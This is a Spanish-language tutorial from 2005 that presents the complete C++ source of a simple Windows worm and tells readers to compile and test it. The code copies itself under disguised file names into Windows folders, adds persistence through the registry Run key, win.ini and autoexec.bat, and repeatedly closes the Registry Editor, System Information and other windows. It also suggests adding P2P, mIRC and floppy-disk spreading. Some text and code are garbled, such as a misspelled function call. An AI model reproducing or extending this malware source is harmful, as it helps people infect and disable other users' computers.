Gusano bsico en C++ con: Dev-C++ 4.9.9.

Haber, el siguiente a articulo, lo he escrito con el fin de poder ensear a crear un gusano muy basico, pero no por ello menos efectivo, todo esto por supuesto en C++, y de paso doy una idea y trucos ya adelantados a todos aquellos que le interesa programar un worm, en el lenguaje C++. Lo que viene es un worm escrito recopilando la informacin de todos los articulos que he escrito anteriormente, para poder crear el gusano, aqu voy a exponer el codigo fuente completo y alguno que otro comentario. #include <windows.h> #include <stdio.h> #include <ctype.h> #include <stdlib.h> #include <string.h> #include <fstream.h> #include <winsock.h> HWND afile; int i; char pathname[256]; char windir[MAX_PATH]; unsigned char pagina[48]="http://www.viricototal.tk"; char sysdir[256]; // declaracin y definciones de las funciones que luego van a ser llamadas por el //gusano en la funcion principal void cierra() //funcion que cierra ventanas { char matriz[4][50]={"Calculadora","Editor del Registro","Informacin del sistema de Microsoft","Documento1 - Microsoft Word"}; for (i=0;i<=4;i++) { afile=FindWindow(0,matriz[i]); PostMessage(afile, WM_QUIT, 0, 0 ); }

Pseudoroot 2005

} void copiar() //copia el gusano en carpetas de windows { strcat(windir,"\\conmand.com"); CopyFile(pathname,windir,0); CopyFile(pathname,"C:\\windows\\win.pif",0); CopyFile(pathname,"C:\\windows\\ini.bat",0); CopyFile(pathname,"C:\\windows\\system32.com",0); CopyFile(pathname,"C:\\windows\\conmand.exe",0); CopyFile(pathname,"C:\\windows\\win.bat",0); CopyFile(pathname,"C:\\windows\\system\\win.bat",0); CopyFile(pathname,"C:\\windows\\welcome.pif",0); } void inis() //escribe en archibos inis { const char key[]="run"; const char archivo[]="win.ini"; WritePrivateProfileString("Windows",key,windir,archivo); } void registro() //nos ponemos en el registro { HKEY hkey; RegOpenKeyEx (HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\run",0, KEY_SET_VALUE,&hkey); RegSetValueEx(hkey,"Sistray32",0,REG_SZ,(const unsigned char*)sysdir,sizeof (sysdir)); RegCloseKey(hkey); } void modibat() { fstream file; file.open("C:\\autoexec.bat",ios::app); file <<"@C:\\WINDOWS\\system32.com" << endl; file.close(); } //funcion principal int WINAPI WinMain(HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR ipszArgument, int nFunsterStil) { GetWindowsDirectory(windir,sizeof(windir)); GetSystemDirectory(sysdir,sizeof(sysdir)); HMODULE hMe=GetModuleHandle(NULL); DWORD nRet=GetModuleFileName(hMe,pathname,256); Pseudoroot 2005

copiar(); registro(); inis(); registro(); do{ Sleep(5000); Cierra(); }while(1); return 0; } He agregado mas cabeceras de las que son necesarias debido a si alguno le agrega mas funciones a su worm no tenga que estar declarando dicha cabecera. Como nos podemos dar cuenta el gusano que he escrito arriba se basa en una recopilacin de todos mis articulos anteriores, y he escrito cada cosa en cada funcion del tipo void, luego en el programa principal llamo a cada una de estas funciones, por supuesto se le pueden agregar mas cosas como por ejemplo una rutina de infeccin para redes p2p y el mirc. O una que liste los archivos de una determinada unidad ,infectando disquete, solo es cosa de ir averiguando e ir escribiendo y probando el cdigo que vayamos escribiendo. No he querido explayarme con mas detalle que es lo que hace cada funcion ya que lo he explicado ya, la idea era juntar el codigo y crear el worm, solo ahora les dejo que lo compilen y lo prueben.

Es todo si hubiera alguna pregunta, como siempre a pseudoroot@viricototal.zzn.com

Pseudoroot//ViricoTotal 2005

Pseudoroot 2005